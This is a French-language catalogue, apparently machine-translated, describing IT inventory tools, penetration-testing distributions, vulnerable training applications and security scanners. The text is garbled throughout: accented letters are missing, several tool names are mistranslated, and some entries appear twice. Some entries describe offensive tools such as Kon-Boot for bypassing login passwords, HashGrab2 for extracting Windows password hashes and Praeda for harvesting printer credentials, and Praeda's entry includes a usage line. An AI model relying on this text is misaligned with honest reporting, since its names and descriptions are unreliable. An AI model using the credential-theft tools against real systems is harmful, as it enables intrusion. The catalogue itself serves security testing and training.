http://www.spiceworks.com/ Spiceworks est la gestion complte du rseau et de surveillance, helpdesk, inventair e PC & Logiciels solution de reporting pour grer tout IT dans les entreprises pet ites et moyennes. Spiceworks vous permet de ... * Inventaire de votre rseau et PC * Surveiller et grer votre rseau * Grer vos actifs informatiques * Grer les changements et des configurations Carte * Votre NetworkBETA * Audit de votre logiciel * Rsoudre les problmes de votre rseau * Excution d'une IT Help Desk * Soyez un MSP Avantages * Parlez-lui Like You Spiceworks IT Desktop est conu pour * Professionnels de l'informatique qui ont des droits admin sur leur rseau. * Organismes de moins de 500 appareils sur leur rseau. Il travaillera avec plus m ais il ne sera pas aussi rapide. * L'excution sur un PC. Il dcouvre Windows, OS X, Linux et Unix, mais vous devez l 'excuter partir d'un PC sur votre rseau. lansweeper http://www.lansweeper.com/ Lansweeper: matriel, rseau et logiciel d'inventaire pour les rseaux Windows Lansweeper est un outil de rseau automatis de dcouverte qui scanne tous vos ordinat eurs et priphriques et les affiche dans une interface Web accessible facilement. Il n'est pas ncessaire d'installer des agents sur les ordinateurs, tous les balay age est effectu par la norme construire-dans la fonctionnalit (WMI, SNMP, ssh ,... ) OS Distro Katana http://www.hackfromacave.com/katana.html Katana est une suite de scurit portatif multi-boot conu pour la plupart de vos beso ins de scurit informatique. L'ide derrire cet outil est de rassembler toutes les dis tributions meilleure scurit courir partir d'un disque USB. Katana comprend les dis tributions qui se concentrent sur les tests de pntration, d'audit, la fissuration de passe, en mdecine lgale et pots de miel. LAMPSecurity http://sourceforge.net/projects/lampsecurity/ formation LAMPSecurity est conu pour tre une srie de vunlerable images de machines virtuelles ainsi que des documents complmentaires conus pour enseigner linux, apac he, php, mysql de scurit. Matriux http://www.matriux.com/ Le Matriux est un phnomne qui a t en attente de se produire. C'est une distribution de scurit comprenant toutes les fonctionnalits d'un groupe de puissant, open source

et des outils gratuits qui peuvent tre utiliss des fins diverses, y compris, mais sans s'y limiter, des tests de pntration, ethical hacking, administration systme e t rseau, la mdecine lgale cyber enqutes, des tests de scurit analyse de la vulnrabilit et bien plus encore. C'est une distribution conue pour les passionns et les profes sionnels de la scurit, bien qu'il puisse tre utilis normalement en tant que votre sy stme de bureau par dfaut. Bote outils de scurit rseau http://sourceforge.net/projects/nst/ "Le Rseau Security Toolkit (NST) est un ISO bootable live CD / DVD (NST Live) et est bas sur Fedora. La trousse a t conue pour faciliter l'accs aux best-of-breed Open Source Network Applications de scurit et devrait fonctionner sur la plupart des p lates-formes x86/x86_64. L'objectif principal de dvelopper cette trousse est de f ournir l'administrateur de scurit rseau avec un ensemble complet d'outils Open Sour ce Network Security. Une interface utilisateur Web de pointe (WUI) est prvu pour l'administration systme, la navigation, l'automatisation et la configuration du rs eau et applications de scurit ont trouv dans la distribution des NST. Dans le monde virtuel, NST peut tre utilis comme une analyse de scurit rseau, de validation et de suivi sur l'entreprise d'hbergement de serveurs virtuels machines virtuelles. NST fait galement un excellent outil pour aider les uns avec les scnarios de reprise sur incident dpannage et le diagnostic. " OWASP Web Broken projet Applications http://code.google.com/p/owaspbwa/wiki/Downloads Open Web Application Security Project (OWASP) Broken Applications Web du projet, une collection d'applications web vulnrable qui est distribu sur une machine virt uelle VMware au format compatible avec leur sans frais VMware Player et VMware S erver produits (ainsi que leurs produits commerciaux). http://sourceforge.net/projects/owaspbwa/files/ Pentoo http://www.pentoo.ch/ Qubes http://qubes-os.org/ Qubes met en uvre la scurit par l'approche d'isolement. Pour ce faire, Qubes utilis e la technologie de virtualisation, d'tre en mesure d'isoler les divers programme s de l'autre, et mme sandbox de nombreux lments au niveau du systme, comme sous-systm e rseau ou de stockage, de sorte que leurs compromis ne portent pas atteinte l'in tgrit du reste de la systme.

Qubes permet l'utilisateur de dfinir de nombreux domaines de la scurit mis en place le plus lger de machines virtuelles (VM), ou AppVMs". Par exemple, utilisateur pe ut avoir personnel, travail, shopping, banque, et alatoire AppVMs et peuvent utili pplications de l'intrieur de ces machines virtuelles, tout comme si elles taient d 'excution sur l'ordinateur local, mais en mme temps qu'ils sont bien isoles les une s des autres. Qubes prend en charge la copie-coller et le partage de fichiers en tre les AppVMs, bien sr. Samoura http://sourceforge.net/projects/samurai/files/ Le Samurai Web Infrastructure de test est un LiveCD ax sur les essais d'applicati ons web. Nous avons recueilli les outils de test du haut et les pr-installs pour c rer l'environnement idal pour tester les applications.

WeakNet Linux http://weaknetlabs.com/main/ "Un must-have pour quiconque s'intresse la scurit ou la mdecine lgale, cette distribu tion de CD-entreprises contient tous les outils dont vous avez besoin de tester vos comptences et d'exceller dans le domaine de l'INFOSEC." - Johnny Long (iHackC harities.org) Dojo de scurit Web http://www.mavensecurity.com/dojo.php Dojo de scurit Web Un logiciel open-source autonome de formation pour les applications Web des test s de pntration de scurit. Outils + Objectifs = Dojo Qu'est-ce? Divers outils web application des tests de scurit et des applications web vulnrable s ont t ajouts une installation propre de Ubuntu v9.10. Pourquoi? Le Web Security Dojo est pour apprendre et pratiquer les techniques de web app t ests de scurit. Il est idal pour les classes de formation et de confrences, car il n 'a pas besoin d'une connexion rseau. Le Dojo contient tout le ncessaire pour comme ncer - outils, des objectifs, et de la documentation. Pratique image machine virtuelle (VirtualBox a recommand, condition VMware) Les cibles incluent: * * * * * OWASP WebGoat v5.2 Damn Vulnerable Web App v1.0.6 Hacme Casino v1.0 OWASP InsecureWebApp v1.0 Les objectifs de formation simple par Maven de scurit (y compris REST et JSON)

Outils: * Burp Suite (version gratuite) v1.3 * W3af version cvs * OWASP Skavengerv0.6.2a * V1.0 RC1 OWASP Dirbuster * Paros v3.2.13 * WebScarab v20070504-1631 * Ratproxy v1.57 betasqlmap * v0.7 * Utiles Firefox add-ons Kon-Boot http://www.piotrbania.com/all/kon-boot/ Kon-Boot est une pice prototype de logiciel qui permet de modifier le contenu d'u n noyau linux (et maintenant aussi le noyau Windows!) la vole (pendant le dmarrage ). Dans l'tat actuel, il compilation permet de connecter un systme Linux en tant q ue l'utilisateur root sans avoir taper le mot de passe ou d'lever les privilges de l 'utilisateur actuel la racine. Pour les systmes Windows, il permet d'entrer un mo t de passe profil protg, sans aucune connaissance du mot de passe. D'autres Agnitio http://sourceforge.net/projects/agnitiotool/

Un outil pour aider les dveloppeurs et professionnels de la scurit d'emploi effectu er des examens code de scurit d'une manire cohrente et reproductible. Agnitio vise r emplacer la nature ad hoc de la scurit d'emploi rvision du code de la documentation , de crer une piste d'audit et de reporting. Caractristiques * * * * Le code de scurit critiques Mesures de scurit l'examen du code et des rapports La scurit des applications code outil d'examen Conseils de scurit statique analyse et de reporting

Buck scurit http://buck-security.sourceforge.net/index.html Buck de scurit est une collection de contrles de scurit pour Linux. Il a t conu pour serveurs Debian et Ubuntu, mais peut tre utile pour n'importe quel systme Linux. Le but de Buck de scurit est, pour vous permettre d'obtenir un aperu rapide de l'tat de scurit de votre systme. En tant qu'administrateur systme linux - mais aussi comm e un utilisateur linux normal - on se demande si votre systme est scuris. Dans cett e situation, il est utile d'avoir une overvirew de l'tat de scurit du systme immdiate ment. Buck de scurit a t conu exactement pour cela. Il excute des tests importants et renvoie les rsultats vous au bout de quelques minutes. A prsent, les tests suivants sont mis en uvre: * * * * * * * * Recherche de fichiers worldwriteable Recherche de rpertoires worldwriteable Recherche des programmes o le setuid est fix Recherche des programmes o le setgid est fix Vrifier votre umask Vrifiez si le sticky-bit est activ pour le rpertoire / tmp Recherche de super-utilisateurs Recherche des outils d'attaque les paquets installs

Cadre CERT Fuzzing de base http://www.cert.org/download/bff/d.html La base Fuzzing cadre (BFF) se compose de deux parties principales: * Une machine virtuelle Linux qui a t optimis pour fuzzing * Un ensemble de scripts et un fichier de configuration qui orchestrent la cours e fuzzing La machine virtuelle est une installation stripped-down Debian avec les modifica tions suivantes: * Le gestionnaire de fentre Fluxbox est utilis la place de la lourde Gnome ou envi ronnements de bureau KDE. * Fluxbox est configur pour ne pas faire ou de se concentrer de nouvelles fentres. Cela peut aider dans des situations o vous pourriez avoir besoin pour interagir avec le systme d'exploitation invit tout une application GUI est fuzzed. Agnitio http://sourceforge.net/projects/agnitiotool/ Un outil pour aider les dveloppeurs et professionnels de la scurit d'emploi effectu er des examens code de scurit d'une manire cohrente et reproductible. Agnitio vise r emplacer la nature ad hoc de la scurit d'emploi rvision du code de la documentation , de crer une piste d'audit et de reporting.

Caractristiques * * * * Le code de scurit critiques Mesures de scurit l'examen du code et des rapports La scurit des applications code outil d'examen Conseils de scurit statique analyse et de reporting

Buck scurit http://buck-security.sourceforge.net/index.html Buck de scurit est une collection de contrles de scurit pour Linux. Il a t conu pour serveurs Debian et Ubuntu, mais peut tre utile pour n'importe quel systme Linux. Le but de Buck de scurit est, pour vous permettre d'obtenir un aperu rapide de l'tat de scurit de votre systme. En tant qu'administrateur systme linux - mais aussi comm e un utilisateur linux normal - on se demande si votre systme est scuris. Dans cett e situation, il est utile d'avoir une overvirew de l'tat de scurit du systme immdiate ment. Buck de scurit a t conu exactement pour cela. Il excute des tests importants et renvoie les rsultats vous au bout de quelques minutes. A prsent, les tests suivants sont mis en uvre: * * * * * * * * Recherche de fichiers worldwriteable Recherche de rpertoires worldwriteable Recherche des programmes o le setuid est fix Recherche des programmes o le setgid est fix Vrifier votre umask Vrifiez si le sticky-bit est activ pour le rpertoire / tmp Recherche de super-utilisateurs Recherche des outils d'attaque les paquets installs

Cadre CERT Fuzzing de base http://www.cert.org/download/bff/d.html La base Fuzzing cadre (BFF) se compose de deux parties principales: * Une machine virtuelle Linux qui a t optimis pour fuzzing * Un ensemble de scripts et un fichier de configuration qui orchestrent la cours e fuzzing La machine virtuelle est une installation stripped-down Debian avec les modifica tions suivantes: * Le gestionnaire de fentre Fluxbox est utilis la place de la lourde Gnome ou envi ronnements de bureau KDE. * Fluxbox est configur pour ne pas faire ou de se concentrer de nouvelles fentres. Cela peut aider dans des situations o vous pourriez avoir besoin pour interagir avec le systme d'exploitation invit tout une application GUI est fuzzed. * Mmoire de randomisation est dsactiv. * VMware Tools est install, qui permet l'OS invit partager un rpertoire avec l'hte. * Le systme d'exploitation est configur pour ouvrir automatiquement une session et commencer X. * sudo est configur pour ne pas demander un mot de passe. * Bande est un lien symbolique vers / bin / true, ce qui empche les symboles d'tre retire lorsque l'application est construite. Le fuzzer utilis par l'ODR est l'application de zzuf Sam Hocevar. Il a t choisi pou r son comportement dterministe, le nombre de fonctionnalits, et la taille lgre.

Croquer http://sourceforge.net/projects/crunch-wordlist/ Crunch est un gnrateur de liste de mots o vous pouvez spcifier un jeu de caractres st andard ou un jeu de caractres que vous spcifiez.crise peut gnrer toutes les combinai sons et permutations possibles. Caractristiques: crunch * gnre des listes de mots dans les deux sens combinaisons et permutations * Il peut produire la rupture par le nombre de lignes ou de taille du fichier * A maintenant reprendre appui * modle prend dsormais en charge nombre et symboles * modle prend dsormais en charge les caractres majuscules et minuscules sparment * Ajoute un rapport de situation lors de la gnration des fichiers multiples Froce http://ha.ckers.org/fierce/ Premirement ce n'est pas froce. Fierce n'est pas un scanner IP, ce n'est pas un ou til de DDoS, il n'est pas conu pour analyser l'ensemble d'Internet ou d'effectuer des attaques non cibles. Il est destin spcifiquement pour localiser des cibles pro bables l'intrieur et l'extrieur d'un rseau d'entreprise. Seuls les objectifs sont nu mrs ( moins que le commutateur nopattern-est utilis). Aucune exploitation est effect ue (sauf si vous faites quelque chose intentionnellement malveillants communiquer avec le commutateur-). Fierce est un outil de reconnaissance. Fierce est un scr ipt Perl qui scanne rapidement domaines (gnralement en quelques minutes, en suppos ant qu'aucun lag rseau) en utilisant plusieurs tactiques. HashGrab2 http://forum.intern0t.net/hacking-tools-utilities/2538-hashgrab-py-automatically -get-windows-login-hashes.html HashGrab2 monte automatiquement tous les lecteurs Windows, il peut trouver, et e n utilisant des extraits samdump2 hachages nom d'utilisateur-mot de passe de SAM et SYSTEM fichiers situs sur le lecteur Windows, aprs quoi il les crit dans le rper toire d'utilisateur spcifi. Jarlsberg http://jarlsberg.appspot.com/ Jarlsberg est une collection de codes, qui montre comment les vulnrabilits des app lications Web peuvent tre exploites et comment se dfendre contre ces attaques. Il p eut vous apprendre attaquer une application en utilisant les failles de scurit com mune web, comme cross-site vulnrabilits scripting (XSS) et la falsification de Cro ss-Site Request (XSRF). Il peut aussi vous apprendre trouver, rparer, et viter ces vulnrabilits communes et d'autres bugs qui ont un impact sur la scurit, telles que le dni de service, la divulgation d'informations, injection SQL, attaques de phis hing navigateur ou l'excution de code distance. En d'autres termes, il enseigne d 'abord comment vous le piratage des uvres, puis il vous permet de lui-mme attaquer avec ces attaques! C'est ainsi que les mains sur l'apprentissage devrait tre! Google aime dcrire comme Jarlsberg une application web de fromage qui a t intention nellement construit avec un certain nombre de vulnrabilits. Le seul pr-requis est q ue vous devez avoir une connaissance globale de fonctionnement d'une application Web et une certaine connaissance de HTML, des modles, des biscuits, AJAX, Python (car il est crit en Python), etc Vous jouez le rle d'un hacker dans ce test. Il v ous donne une brve description sur une vulnrabilit et puis vous avez la tche d'explo iter cette vulnrabilit! Aussi simple que a! Vous tes autoris utiliser vos outils favo ris tels que Burp Proxy, Fiddler, Watcher, etc dans vos efforts.

MetaGooFil http://www.edge-security.com/metagoofil.php Metagoofil est un outil de collecte d'information conu pour extraire les mtadonnes des documents publics (pdf, doc, xls, ppt, odp, ods) disponibles dans la cible d e sites Web aux victimes. Il va gnrer une page html avec les rsultats des mta-donnes extraites, ainsi qu'une li ste de noms d'utilisateurs potentiels trs utile pour prparer une attaque bruteforc e sur les services ouverts comme ftp, pop3, applications web, VPN, etc En outre, il sera extrait de la liste des communiqus chemins dans les mtadonnes, avec cette information, vous pouvez le deviner OS, les noms de rseau, partage des ressources , etc Cette nouvelle version extraits adresse MAC partir de documents Microsoft Office . Maintenant vous pouvez avoir une ide de quel type de matriel qu'ils utilisent. Toutes ces informations ne devraient pas tre disponibles sur le net, mais la plup art des entreprises ne disposent pas de politiques sur la fuite d'informations . .. et la plupart d'entre eux ne connaissent pas cette information existe. Ainsi, vous pouvez leur montrer quelles sont les informations un attaquant peut obteni r, avec cette technique simple. RSMangler http://www.randomstorm.com/rsmangler-security-tool.php RSMangler aura une liste de mots et d'effectuer diverses manipulations sur les a nalogues ceux effectus par John the Ripper avec quelques extras. La principale nouveaut est le mode de permutations qui prend chaque mot dans la l iste et il se combine avec les autres pour produire toutes les permutations poss ibles (pas de combinaisons, pour les questions). Par exemple, le freds mots, poi sson frais, va produire la liste suivante: freds frais poissons fredsfresh fredsfish freshfreds freshfish fishfreds fishfresh fredsfreshfish fredsfishfresh freshfredsfish freshfishfreds fishfredsfresh fishfreshfreds Chacun de ces nouveaux mots est ensuite soumis la calandres d'autres, cause de c ela, nous recommandons fortement avec le mode de permutations activ (par dfaut) qu e vous utilisez une liste de mots trs faible, 3 mots commencent crer une liste fin ale contenant 4245 mots et 5 mots commencent cre une liste contenant 91975. En te st, nous avons essay avec quelques centaines de mots et a abandonn lorsque le fich ier de sortie obtenu la 3G. VIDigger http://www.foundstone.com/us/resources/proddesc/vidigger.htm

VIDigger est un outil conu pour aider les administrateurs de l'infrastructure vir tuelle VMware durcir leur environnement. Bien que la technologie de base de VMwa re est conu pour tre scuris, il ya de nombreux paramtres de configuration et de dploie ment des considrations qui peuvent gravement affecter la scurit globale du dploiemen t de l'infrastructure virtuelle. VIDigger est conu pour aider les administrateurs vrifier la configuration du serveur ESX et les machines virtuelles hberges sur le serveur ESX contre le guide VMware Infrastructure de trempe et d'autres pratique s exemplaires. VIDigger permettra de rcuprer les donnes de configuration sur les machines htes et v irtuels, puis de remettre un rapport personnalisable de domaines problmatiques l' administrateur Virtual. VIDigger est destin tre utilis tout au long du cycle de vie du dploiement la fois comme un outil de durcissement et un outil de suivi des mo difications des paramtres de configuration qui apporte des changements l'attentio n de l'administrateur. L'outil ax sur les changements qui peuvent influer sur la scurit globale de l'hte ESX ou d'une machine virtuelle (s) dploy sur le serveur ESX. Une des caractristiques les plus intressantes de VIDigger est qu'il peut tre tendu p our ajouter de nouveaux contrles que de nouveaux composants sont ajouts l'infrastr ucture virtuelle pas actuellement analyss par l'outil. Vicnum http://sourceforge.net/projects/vicnum/ Vicnum est une application Web flexible et vulnrables qui dmontre des problmes comm uns de scurit Web, tels que par cross site scripting, injections SQL, et les quest ions de gestion de session. Le programme est particulirement utile pour vrificateu rs en TI de perfectionner leurs comptences de scurit Web et la cration de "capture d u drapeau" des exercices de type. Etre une petite application web sans cadre complexes qui se posent, Vicnum peut facilement tre invoque et adapts pour rpondre un besoin spcifique. Par exemple, si un e application de test vulnrables est ncessaire dans l'valuation d'un scanner de scur it Internet ou un pare-feu d'applications Web, vous pouvez contrler une applicatio n Web cible pour voir ce que le scanner peut trouver et ce que le pare-feu peut protger. Finalement, l'objectif majeur de ce projet est de renforcer la scurit des applicat ions web en duquant les diffrents groupes (tudiants, la gestion, les utilisateurs, les dveloppeurs, les vrificateurs) quant ce qui pourrait mal se passer dans une ap plication web. Et bien sr, c'est OK pour s'amuser un peu. sara

http://www-arc.com/sara/ Le vrificateur de scurit assistante de recherche (LEP) est un rseau de troisime gnrati n analyse de la scurit outil qui a t disponible et activement mis jour depuis plus d e 10 ans.Malheureusement, toutes les bonnes choses doivent venir sa fin et il en va de la LEP. SARA 7.9.1 est notre dernire version. En fait, la LEP 7.9.2a est l a version finale. LEP: 1. 2. 3. 4. 5. 6. 7. Fonctionne sous Unix, Linux, MAC OS / X ou Windows (par coLinux) OS. Intgre la base de donnes nationales sur la vulnrabilit (NVD). Effectuer des essais d'injection SQL. Effectuer des tests exhaustifs XSS Peut s'adapter de nombreux environnements de pare-feu. Support distance de soi et des installations de numrisation API. Utilis pour la CEI initiatives de rfrence

8. Plug-in installation pour les applications de tiers 9. normes CVE soutien 10. module de recherche d'entreprise 11. Autonome ou en mode daemon 12. Free-utilisation ouverte SATAN licence oriente xplico http://www.xplico.org/ Le but de Xplico est extrait d'un trafic Internet de saisir les donnes des applic ations contenues. Par exemple, partir d'un fichier pcap Xplico extraits de chaque e-mail (POP, IMA P et SMTP), tous les contenus HTTP, chaque appel VoIP (SIP), FTP, TFTP, et ainsi de suite. Xplico n'est pas un analyseur de protocole rseau. Xplico est une sourc e ouverte Network Forensic Analysis Tool (NFAT). Scanner CHScanner http://code.google.com/p/chscanner/ CHScanner est un ARP, IPv4 et IPv6 scanner rseau avec 31 mthodes de numrisation: il scanne les ports ouverts, des protocoles, informations NetBIOS et les parts de Windows, les informations SNMP et WMI (WBEM) d'information. Il ont galement la po ssibilit d'activer (en utilisant le Wake-On-LAN) et l'arrt ou le redmarrage d'un hte distant Windows. Caractristiques automatique (scriptable) mode de fonctionnement , un mode de chasse, un mode passif et le mode de balayage normal. Certains dtails Les principales diffrences entre CHScanner et d'autres outils similaires sont: CHScanner * utiliser un systme d'exploitation Mimic technologie; * CHScanner a beaucoup plus de mthodes de balayage par rapport beaucoup d'autres scanners, partir de la couche 2 du modle OSI. Il ne scanne seulement les adresses IPv4, elle utilise aussi ARP, IGMP, IPv6 et certains protocoles de niveau suprie ur comme NetBIOS, SNMP et WMI; * Il est trs flexible, la numrisation se fait sur la base des fichiers de configur ation utilisateur dfini, et assez rapide; * Outre l'interface skinnable graphique, CHScanner peut tre utilis en ligne de com mande pour automatiser les scans. Modes de numrisation * Le mode Normal: c'est le mode commun utilis par la plupart des scanners aujourd 'hui, * Le mode passif: dans ce mode NO paquet est envoy, CHScanner seulement d'couter l e trafic rseau et dcode les paquets reus, semblable un sniffer; * Mode Hunt: introduit avec la version 0.9.7.2, dans ce mode CHScanner va scanne r tout hte qui tente de communiquer avec la machine hte. Le balayage est dclench par l'un a reu des paquets suivants destins la machine locale: requte ARP, ICMP Echo R equest, TCP SYN. En utilisant les donnes de golocalisation fournies par MaxMind vous pouvez trouver le pays associ une adresse IPv4 spcifiques; * Automatique, scriptable, mode: si l'instruction de sorte, par des paramtres de ligne de commande, CHScanner va faire son travail bas sur le fichier de configura tion fourni comme l'un des paramtres, sauvegarder le rsultat et fermer.

Systme d'exploitation Mimic brve description de la technologie Fondamentalement, cela signifie que les paquets envoys mule le comportement des di ffrents systmes d'exploitation et / ou de leurs outils natifs (o est le cas). Actue llement, il mule les suivantes: * * * * * * Windows XP Professionnel SP2 Windows Server 2003 Linux noyau 2.4 (Adamantix base) 2.6 du noyau Linux (Fedora Core base) Solaris 8 OpenSolaris (Nevada 35)

Il ya aussi un "random" mode o les paquets sont les donnes d'identification alatoir e gnr. Le Solaris 8 mulation ne peut tre poursuivi et d'mulation pour OpenSolaris (Nev ada 35) peut tre ajout. CSniffer

http://download.mcafee.com/products/tools/csniffer/csniffer.exe Cet outil agit comme un sniffer rseau Ethernet standard. Toutefois, contrairement un paquet sniffer traditionnels ne pas tenter de capturer et de dcoder l'ensembl e du trafic, mais est plutt oriente vers la dcouverte de l'infrastructure et des do nnes utiles lies la scurit du rseau, souvent de la circulation n'est pas envoy vers o depuis le rseau du systme hte savoir diffusion gnrale la circulation. Ces donnes peu ent rvler toutes sortes d'informations utiles, allant des systmes en direct sur le rseau, les noms d'htes, des systmes IPv6, les routeurs et les serveurs de noms, nom s d'utilisateur et mots de passe. exigences de l'outil CSniffer fonctionne sur les systmes Microsoft Windows (Windows 2000 vers le haut) et tente de renifler les donnes rseau en mode promiscuous. Il peut utiliser une d es deux mthodes pour y parvenir: - Utilisation de Windows "Built-in raw sockets API (par dfaut). - Utiliser le gestionnaire de paquet WinPcap. Limitations Outre les exigences prcites de fonctionner sous un compte de niveau administrateur , il existe certaines limitations svres lors de l'utilisation intgre dans Windows so ckets mode brut.

Les premires prises de Microsoft API a plusieurs restrictions qui ont t introduites au fil des annes dans un effort pour rduire les risques de scurit associs l'accs f le niveau des paquets rseau.Selon la plate-forme que vous utilisez sur vous pouve z constater que vous tes limits dans ce que les donnes peuvent tre vus sur le rseau. Une liste complte de toutes les limites connues vu sur diffrents systmes d'exploita tion Windows et les niveaux de service pack de ces systmes d'exploitation n'a pas t compile, mais voici quelques problmes connus. Encore une fois, cela ne s'applique qu' Windows sockets mode brut. - Sortant UDP et ICMP ne sont pas capturs (OS, spcifiques SP). - Sur Windows XP SP1, XP SP3 et Vista ne paquets sortants de toute nature sont c apturs. - Sous Windows Vista avec SP1, seuls les paquets UDP sont capturs.paquets TCP ne sont pas capturs. Silex

http://runplaybook.com/p/11 Flint examine les pare-feu, calcule rapidement l'effet de toutes les rgles de con figuration, puis des taches tant de problmes, vous pouvez: * CLEAN UP CONFIGURATIONS RUSTY qui sont crudded avec des rgles qui ne peuvent pa s correspondre la circulation. * LIMINER LATENTE PROBLEMES DE SECURITE tapi dans des rgles trop permissives * SANITY Vrifier les modifications pour voir si de nouvelles rgles de crer des prob lmes. Pourquoi vous avez besoin Flint Vous avez plusieurs pare-feu protgeant les rseaux internes de l'Internet et de con trler l'accs aux donnes des clients. Votre entreprise change, et ainsi de faire vot re pare-feu, et pas toujours dans le mme temps. Pare-feu peuvent sortir de l'tape avec les politiques. Tout le monde fait des erreurs. Pour comprendre une configuration de pare-feu, v ous devez lire des centaines de lignes de configuration, puis vous devez penser comme un pare-feu ne. Les gens ne sont pas bonnes penser comme les pare-feu. Ain si, la plupart des pare-feu sont truffes de fautes subtiles. Certaines de ces err eurs peuvent coter cher: * L'INSCURIT SERVICES pourrait tre autoris traverser le pare-feu, l'empchant de bloqu er les attaques. * Contrle laxiste des DMZ peut exposer les serveurs de prparation et de test. * FIREWALL ports de gestion peuvent tre exposs des rseaux non scuriss. * REDONDANT rgles pare-feu peut tre compliqu votre configuration et vous ralentir. Qu'est-ce qu'on peut faire avec Flint Vrifier les rgles avant son dploiement dans LES Flint empche ingnieurs de faire des e rreurs coteuses. Il faut quelques instants pour Flint pour valuer un ensemble de rg les et erreurs place. Votre quipe peut-elle et en quelques minutes. Flint est fai ble trane, pas de drame. CLEAN UP Ensembles de rgles RUSTY Flint ne le dur travail de dcapage des rgles de p are-feu pour crud inutiles, conomiser du temps et permet votre quipe de se concent rer sur des problmes d'ingnierie qui importent vraiment. Flint pouvez reprer les rgl es redondantes et contradictoires, et Flint, il est plus facile de dtecter les pr oblmes au niveau des entreprises. COMPREHEND configurations complexes Flint ne suffit de cocher les pare-feu pour les problmes. Il a galement comprend parfaitement le sens des lignes de configurat ion, et les dcompose pour vous par service ou par l'interface, de sorte que vous pouvez voir en un coup d'oeil ce que n'importe quel pare-feu donne est fait. Comment obtenir Flint Flint est distribu sous forme de source. Il est mis en uvre dans le rubis. Analyseur Microsoft surface d'attaque http://www.microsoft.com/downloads/en/details.aspx?FamilyID=1283b765-f57d-4ebb-8 f0a-c49c746b44b9&displaylang=en&pf=true # Prsentation La surface d'attaque Analyzer est le mme outil utilis par les quipes de Microsoft d u produit intrieur aux changements catalogue apportes au systme d'exploitation de l 'installation de nouveaux logiciels. Analyseur de la surface d'attaque prend un instantan de votre tat du systme avant e

t aprs l'installation du produit (s) et affiche les changements un certain nombre d'lments cls de la surface d'attaque de Windows. Ceci permet: - Les dveloppeurs de visualiser les changements de la surface d'attaque rsultant d e l'introduction de leur code sur la plate-forme Windows - Les professionnels pour valuer la surface d'attaque globale changement par l'in stallation de la ligne de l'organisation des applications d'entreprise - IT comptes de scurit d'valuer le risque d'un morceau particulier de logiciel inst all sur la plate-forme Windows au cours des examens du risque de menace - IT Security Incident intervenants d'acqurir une meilleure comprhension de l'tat d 'un des systmes de scurit au cours des enqutes (si un scanner de base a t prise du sys tme au cours de la phase de dploiement) Microsoft Baseline Security Analyzer http://www.microsoft.com/downloads/details.aspx?FamilyID=b1e76bbe-71df-41e8-8b52 -c871d012ba78&displaylang=en Le Microsoft Baseline Security Analyzer fournit une mthode rationalise pour identi fier les mises jour de scurit manquantes et les erreurs de configuration de scurit c ommune. MBSA 2.1.1 est une mise jour mineure pour ajouter le support pour Window s 7 et Windows Server 2008 R2. Nessus http://www.nessus.org/nessus/ Le scanner de vulnrabilit Nessus est le leader mondial de scanners active, avec la dcouverte grande vitesse, la vrification de configuration, le profilage d'actifs, la dcouverte des donnes sensibles et analyse de la vulnrabilit de votre posture de scurit.Nessus scanners peuvent tre distribus dans toute l'entreprise, l'intrieur DMZ et travers les rseaux physiquement spars. Netbios-part-scanner http://www.aldeid.com/index.php/Netbios-shares-scanner Netbios Actions scanner a t dvelopp par SecPoint. L'outil analyse une adresse IP et tente de rcuprer les disques partags et de leur contenu. Il travaille pour les post es de travail Windows / serveurs ainsi que pour les botes Linux (smbclient utilis pour la connexion). Plecost http://www.iniqua.com/labs/plecost/ Wordpress doigt imprimante outil de recherche et de rcuprer des informations sur l es versions des plugins installs dans les systmes de Wordpress. Il peut analyser une URL unique ou d'effectuer une analyse fonde sur les rsultats indexs par Google. En outre affiche CVE code associ chaque plugin, si. Praeda http://www.foofus.net/?page_id=218 http://www.foofus.net/?p=223 En tirant parti de scurit de l'imprimante pauvres et vulnrables au cours de tests d e pntration, nous sommes en mesure de rcolter une mine d'informations partir de prip hriques MFP y compris les noms d'utilisateurs, adresses e-mail, carnet d'adresses des utilisateurs, y compris les informations d'authentification SMB, Email, mot s de passe LDAP, etc Parfois, ils pourraient aussi vous aider dans la rcupration d istance de gravures, de fax, de numrisation des copies! Certaines installations i

mprimante peut galement vous permettre d'accder l'interface HTTP, et de faire une copie de configuration! Cela pourrait vous permettre de continuer voir les entra illes! En bref, praeda est conu pour automatiser une partie de la collecte d'info rmations provenant des appareils de rseau travers des interfaces web de gestion t els que les imprimantes et les appareils du rseau.

Cet outil open source est programm en Perl et dispose de plusieurs modules qui po rtent sur prs de 28 appareils en tout! Le module utiliser est numr des diffrents modl s d'imprimantes utilisant des Page de titre et Type de serveur" les rponses de la pa ge de gestion d'imprimante. Ses modules Perl ncessaires sont: LWP:: Simple LWP:: UserAgent HTML:: TagParser URI:: Fetch HTTP:: Cookies Exemple de syntaxe: praeto.pl TARGET_FILE TCP_PORT PROJECT_NAME fichier_sortie RIPS http://sourceforge.net/projects/rips-scanner/ RIPS est un analyseur statique de code source pour les vulnrabilits dans PHP webap plications. RIPS automatise le processus d'identification des failles de scurit potentielles d ans le code source PHP en utilisant d'analyse statique de code source. Caractristiques du RIPS: - Dtecter les XSS, SQLI, Dossier d'information, LFI / RFI, vulnrabilits RCE et plus - 5 niveaux de verbosit pour le dbogage de votre analyse des rsultats - Marquer les lignes vulnrables dans la visionneuse de code source - Code de la fonction dfinie par l'utilisateur par passage de la souris sur appel dtect - La liste de toutes les fonctions dfinies par l'utilisateur et les points d'entre du programme - (entre de l'utilisateur) reli la visionneuse de code source - Crer des exploits CURL pour les vulnrabilits dtectes en quelques clics - 7 syntaxe diffrente soulignant schma de couleur - La seule exigence minimale est un serveur web local avec PHP et d'un navigateu r Seccubus http://sourceforge.net/projects/seccubus/ Outil pour dclenche automatiquement des balayages de scurit rguliers avec Nessus. Co mparer les rsultats de l'analyse en cours avec l'analyse prcdente et rapport sur le delta, dans une interface web. L'objectif principal de l'outil est de faire des balayages rpts plus efficace SkipFish http://code.google.com/p/skipfish/ Entirement automatis, l'application web de reconnaissance active outil de scurit. Pr incipales caractristiques: * Grande vitesse: le code C pure, hautement optimis la gestion HTTP, empreinte mi

nimale du CPU - facilement atteindre 2000 requtes par seconde avec des objectifs adapts. * Facilit d'utilisation: heuristiques pour soutenir une varit de cadres web origina ux et sites technologie mixte, avec des capacits d'apprentissage automatique, sur la vole cration liste de mots, et l'autocompltion forme. * Logique de scurit de pointe: de haute qualit, faible de faux positifs, les contrle s de scurit diffrentiel, capable de reprer une srie de dfauts subtils, y compris les v ecteurs d'injection aveugles. L'outil est considr comme le support de Linux, FreeBSD, MacOS X et Windows (Cygwin ) environnements. SoftPerfect Network Scanner

